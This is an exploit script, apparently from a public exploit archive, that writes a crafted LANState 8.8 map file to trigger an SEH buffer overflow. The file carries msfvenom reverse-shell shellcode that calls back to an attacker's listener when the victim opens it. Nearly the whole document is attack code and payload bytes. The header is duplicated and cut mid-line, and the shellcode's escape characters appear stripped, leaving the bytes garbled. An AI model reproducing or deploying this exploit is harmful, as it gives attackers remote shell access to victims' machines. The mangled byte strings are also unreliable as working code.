10-Strike LANState 8.8 Local Buffer Overflow

# Exploit Title: 10-Strike LANState 8.8 - Local Buffer Overflow (SEH)
# Date: 2018-07-24
# Exploit Author: absolomb
# Vendor Homepage: https://www.10-strike.com/products.shtml
# So # Exploit Title: 10-Strike LANState 8.8 - Local Buffer Overflow (SEH)
# Date: 2018-07-24
# Exploit Author: absolomb
# Vendor Homepage: https://www.10-strike.com/products.shtml
# Software Link: https://www.10-strike.com/lanstate/download.shtml
# Version 8.8
# Tested on: Windows 7 SP 1 x86

# Open LANState, File -> Open, browse to generated lsm file, boom shell.
# If it doesn't work first try, close the tab at the bottom and reopen the file

#!/usr/bin/python

lsm = """[VERSION INFO]
PROG_NAME=LANState
PROG_VER=8.85
MAP_VER=8.3
MAPID=584636991

[OBJECT#4]
index=4
ObjName=
ObjCaption={0}
ObjHint=
ObjLink=
POS_X=100
POS_Y=0
Width=65
Height=65
ImageWidth=31
ImageHeight=32
StdImageIndex=1
ImageFilePath=
FontName=Arial
FontColor=0
FontSize=8
FontCharset=1
FontStyle=0
TextAlignment=2
TextLayout=0
ObjType=1
OBJ_ID=1
TYPE_ID=2
IP=
REMOTE_NAME=A
MAP_NAME=
MAC_ADDR=
OS=
SNMPAgent=0
SNMPVer=1
SNMPUname=
SNMPPassw=
SNMPPrivPassw=
SNMPSecLevel=0
SNMPAuthType=0
SNMPPrivType=0
Community=
ALWAYS_ON=0
ImageEnabled=0
ImageFile=
IPList=
CurrentUser=
DESCRIPT=
CheckInterval=60
DownTime1=0
DownTime1Start=12:00:00 AM
DownTime1Finish=12:00:00 AM
DownTime2=0
DownTime2Start=12:00:00 AM
DownTime2Finish=12:00:00 AM
DownTime3=0
DownTime3Start=12:00:00 AM
DownTime3Finish=12:00:00 AM
DownTime4=0
DownTime4Start=12:00:00 AM
DownTime4Finish=12:00:00 AM
DownTime5=0
DownTime5Start=12:00:00 AM
DownTime5Finish=12:00:00 AM
DownTime6=0
DownTime6Start=12:00:00 AM
DownTime6Finish=12:00:00 AM
DownTime7=0
DownTime7Start=12:00:00 AM
DownTime7Finish=12:00:00 AM
DTDoNotAlert=1
RunFirstOnly=0
FirstIsPassed=1
CHECK#0/HostAddr={0}
CHECK#0/CID=1
CHECK#0/NumRetries=1
CHECK#0/RetInterval=30
CHECK#0/IsMainCheck=0
CHECK#0/KeepStat=1
CHECK#0/CheckType=0
CHECK#0/CheckOn=1
CHECK#0/CheckRTTime=0
CHECK#0/RTTime=1000
CHECK#0/PacketsCount=4
CHECK#0/TimeOut=500
CHECK#0/SizeBuf=32

[VIEW]
FonImage=0
FonImageFile=
ImagePosition=0
ImageOffsetX=16
ImageOffsetY=16
ImgW=0
ImgH=0
ImgAutoSize=1
ScaleFactor=1
ScrollX=0
ScrollY=0
BkGroundColor=16777215
FontName=Arial
FontColor=-16777208
FontSize=8
FontCharset=1
FontStyle=0
Gradient=0
Color1=15780518
Color2=16777215
WebUseSmallIcons=0
CurIconSize=32
LockAreas=0
LockLines=0
LockHosts=0
WindowState=2
WindowTop=-10
WindowsLeft=12
WindowWidth=800
WindowsHeight=600

"""

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.47.128 LPORT=443 -e x86/alpha_mixed BufferRegister=EDI -f python -v shellcode
shellcode = ""
shellcode += "x57x59x49x49x49x49x49x49x49x49x49x49"
shellcode += "x49x49x49x49x49x49x37x51x5ax6ax41x58"
shellcode += "x50x30x41x30x41x6bx41x41x51x32x41x42"
shellcode += "x32x42x42x30x42x42x41x42x58x50x38x41"
shellcode += "x42x75x4ax49x49x6cx6bx58x4fx72x57x70"
shellcode += "x47x70x77x70x75x30x6cx49x69x75x45x61"
shellcode += "x4bx70x71x74x4cx4bx62x70x64x70x4ex6b"
shellcode += "x62x72x54x4cx6ex6bx71x42x65x44x4cx4b"
shellcode += "x70x72x34x68x64x4fx4dx67x62x6ax76x46"
shellcode += "x56x51x79x6fx6ex4cx65x6cx75x31x71x6c"
shellcode += "x44x42x74x6cx61x30x59x51x7ax6fx64x4d"
shellcode += "x47x71x58x47x49x72x6ax52x66x32x62x77"
shellcode += "x6ex6bx50x52x56x70x6ex6bx53x7ax77x4c"
shellcode += "x4cx4bx50x4cx46x71x73x48x38x63x62x68"
shellcode += "x37x71x78x51x30x51x6ex6bx73x69x75x70"
shellcode += "x67x71x78x53x4ex6bx77x39x64x58x68x63"
shellcode += "x75x6ax37x39x4cx4bx55x64x4ex6bx35x51"
shellcode += "x6ax76x74x71x6bx4fx6cx6cx6fx31x7ax6f"
shellcode += "x56x6dx75x51x4ax67x75x68x4dx30x30x75"
shellcode += "x78x76x43x33x53x4dx68x78x37x4bx61x6d"
shellcode += "x65x74x44x35x4ax44x30x58x4cx4bx62x78"
shellcode += "x31x34x35x51x4bx63x31x76x6cx4bx46x6c"
shellcode += "x72x6bx6ex6bx66x38x35x4cx35x51x6bx63"
shellcode += "x6cx4bx74x44x6cx4bx53x31x78x50x6ex69"
shellcode += "x73x74x44x64x35x74x43x6bx63x6bx51x71"
shellcode += "x32x79x50x5ax73x61x79x6fx79x70x31x4f"
shellcode += "x33x6fx51x4ax6ex6bx45x42x7ax4bx4cx4d"
shellcode += "x43x6dx73x58x57x43x67x42x55x50x43x30"
shellcode += "x51x78x42x57x42x53x66x52x71x4fx66x34"
shellcode += "x45x38x72x6cx73x47x57x56x37x77x49x6f"
shellcode += "x7ax75x68x38x7ax30x43x31x43x30x33x30"
shellcode += "x36x49x4ax64x73x64x62x70x30x68x44x69"
shellcode += "x4dx50x30x6bx37x70x69x6fx59x45x62x70"
shellcode += "x42x70x76x30x30x50x61x50x62x70x57x30"
shellcode += "x46x30x51x78x78x6ax54x4fx49x4fx6bx50"
shellcode += "x6bx4fx4ax75x4ax37x53x5ax57x75x42x48"
shellcode += "x39x50x69x38x36x4fx4bx30x50x68x34x42"
shellcode += "x65x50x65x51x4dx6bx6cx49x39x76x33x5a"
shellcode += "x36x70x72x76x76x37x31x78x7ax39x4dx75"
shellcode += "x52x54x61x71x59x6fx79x45x6bx35x39x50"
shellcode += "x62x54x34x4cx39x6fx50x4ex77x78x62x55"
shellcode += "x78x6cx53x58x48x70x4cx75x39x32x76x36"
shellcode += "x59x6fx58x55x70x68x53x53x52x4dx62x44"
shellcode += "x43x30x4ex69x6ax43x71x47x71x47x61x47"
shellcode += "x64x71x39x66x50x6ax34x52x33x69x42x76"
shellcode += "x38x62x4bx4dx51x76x4ax67x51x54x75x74"
shellcode += "x47x4cx56x61x46x61x6cx4dx37x34x57x54"
shellcode += "x54x50x7ax66x65x50x42x64x50x54x52x70"
shellcode += "x73x66x71x46x31x46x37x36x32x76x42x6e"
shellcode += "x33x66x71x46x62x73x61x46x32x48x50x79"
shellcode += "x38x4cx45x6fx4dx56x6bx4fx79x45x4fx79"
shellcode += "x49x70x52x6ex62x76x37x36x4bx4fx34x70"
shellcode += "x65x38x57x78x6ex67x65x4dx35x30x69x6f"
shellcode += "x58x55x4dx6bx5ax50x4fx45x69x32x33x66"
shellcode += "x42x48x6dx76x6cx55x4dx6dx4fx6dx49x6f"
shellcode += "x4ax75x75x6cx43x36x63x4cx67x7ax6fx70"
shellcode += "x6bx4bx6bx50x43x45x56x65x6fx4bx43x77"
shellcode += "x62x33x73x42x72x4fx33x5ax55x50x63x63"
shellcode += "x79x6fx6ex35x41x41"

align_stack = 'x58' # POP EAX
align_stack += 'x58' # POP EAX
align_stack += 'x05x61x55x55x55' # ADD EAX,55555561
align_stack += 'x05x61x55x55x55' # ADD EAX,55555561
align_stack += 'x05x62x56x55x55' # ADD EAX,55555662
align_stack += 'x50' # PUSH EAX
align_stack += 'x5f' # POP EDI

# JMP always true
nseh = 'x71x06x70x04'

#01BA7647 POP POP RET LANState.exe
seh = 'x47x76xbax01'

payload = 'x41' * 235
payload += nseh
payload += seh
payload += align_stack
payload += 'x41' * 265
payload += shellcode
payload += 'x41' * (3492 -len(shellcode + align_stack))

buffer = lsm.format(payload)

file = open('sploit.lsm','w')
print "Size: " + str(len(payload)) + " bytes"
file.write(buffer)
file.close()
print "Map file created!"